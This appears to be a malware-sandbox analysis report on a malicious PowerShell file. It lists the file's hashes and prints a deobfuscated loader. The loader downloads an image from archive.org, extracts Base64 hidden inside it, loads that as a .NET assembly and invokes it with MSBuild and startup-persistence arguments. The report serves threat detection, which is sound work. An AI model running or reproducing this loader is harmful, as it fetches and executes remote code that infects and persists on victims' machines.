Malicious

d65e895e96bfcd528a74bd6278e67841

PowerShell | MD5: d65e895e96bfcd528a74bd6278e67841 | Size: 1.03 MB | application/x-powershell

Characteristics
Hash | Hash Value
MD5 | d65e895e96bfcd528a74bd6278e67841
Sha1 | 507b32bd72061c6a7794d9c4d9267cd2c9e45ea3
Sha256 | 34d6e23994ad8b890e50be8487a4a405310f1616df5e23b1639e5fbc540deffc
Sha384 | e456c4d9bd81362a17d550e369e57552616fa20b0d91368d0056d80db9b6f34f2fc01e7b4ce4f91d0d7dd48dbe07d775
Sha512 | 155f2a76aaf57548fc972c876840389d7f3ebda00b6348515cb79d54ad742230fbbe333548ec4185fb01058891387aeb3f42b2091b9d361a6235166b3b9e74be
SSDeep | 12288:awt4c9W3mDO1GzTR2Fwt4c9W3mDO1GzTR23wt4c9W3mDO1GzTR2m:Z4+W2KFy4+W2KFw4+W2KFm
TLSH | 2425CF5E352A457E6586B0B822094172F08EC7E1C36EE3F2D460D868E095CBDD1BE7B7
File Structure
[PowerShell Command]: Malicious
[Deobfuscated PS]: Malicious
[Deobfuscated PS]: Malicious
[Base64-Block]
Artefacts
Name: Deobfuscated PowerShell
Value:

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://archive.org/download/optimized_msi_20250814/optimized_MSI.png" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd")
$valor = $matches[1]
$assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor))
$olinia = "==gJlVjZ5ImZ ykTZ3IjM1IWOlZ2Y5cjM0QGNjJzMlFGO4ITM0UWM4UDOzMmZyQDOzYmZlRWZkNTMxQDOldzNwgjZ 40TboZyMilTYwEGO20zcpZyMzImZxEGO20Del9Dd4RnLNZ1LzUTN5IzN0UTM0ETM1AzM2ADNx8yN 1gTO3UDO3YTOyATN4YjMwQTMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa"
$type = $assembly."GetType"("ClassLibrary1.Home")
$method = $type."GetMethod"("VAI")
$method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "MSBuild", "", "MSBuild", "", "", "", "Name_File", "js", "1", "", "", "0", "startup_onstart") } ))

Characteristics
No malware configuration was found at this point.